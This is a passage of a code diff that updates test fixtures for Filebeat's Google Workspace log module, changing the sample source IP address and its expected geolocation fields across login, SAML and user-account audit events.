+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -457,7 +425,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}",
         "event.provider": "login",
         "event.type": [
             "info"
@@ -468,26 +436,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3448,
+        "log.offset": 3440,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -509,7 +473,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
         "event.outcome": "failure",
         "event.provider": "login",
         "event.type": [
@@ -524,26 +488,22 @@
         "google_workspace.login.type": "exchange",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3768,
+        "log.offset": 3759,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -564,7 +524,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
         "event.outcome": "failure",
         "event.provider": "login",
         "event.type": [
@@ -578,26 +538,22 @@
         "google_workspace.login.type": "exchange",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4262,
+        "log.offset": 4252,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -618,7 +574,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
         "event.outcome": "failure",
         "event.provider": "login",
         "event.type": [
@@ -633,26 +589,22 @@
         "google_workspace.login.type": "exchange",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4743,
+        "log.offset": 4732,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -674,7 +626,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
         "event.provider": "login",
         "event.type": [
             "end"
@@ -686,26 +638,22 @@
         "google_workspace.login.type": "exchange",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5273,
+        "log.offset": 5261,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -727,7 +675,7 @@
         "event.dataset": "google_workspace.login",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}",
         "event.outcome": "success",
         "event.provider": "login",
         "event.type": [
@@ -742,26 +690,22 @@
         "google_workspace.login.type": "exchange",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5627,
+        "log.offset": 5614,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log
index ed672b58a568..ca7933706be6 100644
--- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log
@@ -1,2 +1,2 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json
index d6f84e5c64fc..c7a292fcd225 100644
--- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json
@@ -9,7 +9,7 @@
         "event.dataset": "google_workspace.saml",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
         "event.outcome": "failure",
         "event.provider": "saml",
         "event.type": [
@@ -30,23 +30,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -68,7 +64,7 @@
         "event.dataset": "google_workspace.saml",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}",
         "event.outcome": "success",
         "event.provider": "saml",
         "event.type": [
@@ -84,26 +80,22 @@
         "google_workspace.saml.orgunit_path": "ounit",
         "google_workspace.saml.status_code": "SUCCESS_URI",
         "input.type": "log",
-        "log.offset": 622,
+        "log.offset": 621,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log
index 7da8fdec9353..230deadf26e7 100644
--- a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log
@@ -1,8 +1,8 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"2sv_change","name":"2sv_disable"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"2sv_change","name":"2sv_enroll"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"password_change","name":"password_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_email_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_phone_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_secret_qa_edit"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"titanium_change","name":"titanium_enroll"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"titanium_change","name":"titanium_unenroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"2sv_change","name":"2sv_disable"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"2sv_change","name":"2sv_enroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"password_change","name":"password_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_email_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_phone_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_secret_qa_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"titanium_change","name":"titanium_enroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"titanium_change","name":"titanium_unenroll"}}
diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json
index cce07c42cf24..17525548f367 100644
--- a/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/user_accounts/test/user_accounts-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.user_accounts",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}",
